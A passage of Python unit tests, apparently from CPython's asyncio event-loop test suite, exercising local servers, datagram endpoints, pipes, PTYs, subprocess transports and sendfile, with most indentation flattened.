ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
        self.check_ssl_extra_info(client, peername=(host, port),
                                  peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
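        # With host=None the server listens on both IPv4 and IPv6; the test
        # connects over each address family in turn.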
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
                    self.assertLessEqual(try_count, 5)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
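        # The server protocol echoes every datagram back prefixed with b'resp:'.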
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
        # the client received b'resp:xxx' (8 bytes) echoed back by the server
        self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
if (sys.platform == 'win32' and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)):
raise unittest.SkipTest(
'UDP is not supported with proactor event loops')
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
            assert False, 'Cannot create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
        # This test reproduces issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
@unittest.skipIf(sys.platform == 'darwin', 'test hangs on MacOS')
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
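        # Cancelling a pending sock_recv() must finish promptly instead of
        # blocking until data arrives.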
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
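        # Count how many times _run_once() executes while awaiting a series of
        # tiny sleeps, to check the event loop's timeout rounding behaviour.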
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2, loop=loop)
await asyncio.sleep(1e-4, loop=loop)
await asyncio.sleep(1e-6, loop=loop)
await asyncio.sleep(1e-8, loop=loop)
await asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
        # The ideal number of calls is 12, but on some platforms the selector
        # may sleep slightly less than the timeout, depending on the resolution
        # of the clock used by the kernel. Tolerate a few extra calls on
        # these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
        # every operation must raise RuntimeError once the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
        _, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
class SendfileBase:
DATA = b"12345abcde" * 160 * 1024 # 160 KiB
@classmethod
def setUpClass(cls):
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
class SockSendfileMixin(SendfileBase):
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
async def wait_closed(self):
await self.fut
def make_socket(self, cleanup=True):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
if cleanup:
self.addCleanup(sock.close)
return sock
def prepare_socksendfile(self):
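        # Set up a connected non-blocking client socket and a server protocol
        # that collects received data, using small socket buffers.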
sock = self.make_socket()
proto = self.MyProto(self.loop)
port = support.find_unused_port()
srv_sock = self.make_socket(cleanup=False)
srv_sock.bind((support.HOST, port))
server = self.run_loop(self.loop.create_server(
lambda: proto, sock=srv_sock))
self.run_loop(self.loop.sock_connect(sock, ('127.0.0.1', port)))
def cleanup():
if proto.transport is not None:
# can be None if the task was cancelled before
# connection_made callback
proto.transport.close()
self.run_loop(proto.wait_closed())
server.close()
self.run_loop(server.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test_sock_sendfile_success(self):
sock, proto = self.prepare_socksendfile()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(proto.data, self.DATA)
self.assertEqual(self.file.tell(), len(self.DATA))
def test_sock_sendfile_with_offset_and_count(self):
sock, proto = self.prepare_socksendfile()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(proto.data, self.DATA[1000:3000])
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(ret, 2000)
def test_sock_sendfile_zero_size(self):
sock, proto = self.prepare_socksendfile()
with tempfile.TemporaryFile() as f:
ret = self.run_loop(self.loop.sock_sendfile(sock, f,
0, None))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 0)
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_mix_with_regular_send(self):
buf = b'1234567890' * 1024 * 1024 # 10 MB
sock, proto = self.prepare_socksendfile()
self.run_loop(self.loop.sock_sendall(sock, buf))
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
self.run_loop(self.loop.sock_sendall(sock, buf))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
expected = buf + self.DATA + buf
self.assertEqual(proto.data, expected)
self.assertEqual(self.file.tell(), len(self.DATA))
class SendfileMixin(SendfileBase):
class MySendfileProto(MyBaseProto):
def __init__(self, loop=None, close_after=0):
super().__init__(loop)
self.data = bytearray()
self.close_after = close_after
def data_received(self, data):
self.data.extend(data)
super().data_received(data)
if self.close_after and self.nbytes >= self.close_after:
self.transport.close()
    # Note: sendfile over an SSL transport always uses the fallback implementation
def prepare_sendfile(self, *, is_ssl=False, close_after=0):
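        # Create a connected client/server protocol pair (optionally over SSL)
        # with reduced socket buffers to exercise partial sends.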
port = support.find_unused_port()
srv_proto = self.MySendfileProto(loop=self.loop,
close_after=close_after)
if is_ssl:
if not ssl:
self.skipTest("No ssl module")
srv_ctx = test_utils.simple_server_sslcontext()
cli_ctx = test_utils.simple_client_sslcontext()
else:
srv_ctx = None
cli_ctx = None
srv_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # reduce the receive socket buffer size to test on relatively small data sets
srv_sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
srv_sock.bind((support.HOST, port))
server = self.run_loop(self.loop.create_server(
lambda: srv_proto, sock=srv_sock, ssl=srv_ctx))
if is_ssl:
server_hostname = support.HOST
else:
server_hostname = None
cli_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # reduce the send socket buffer size to test on relatively small data sets
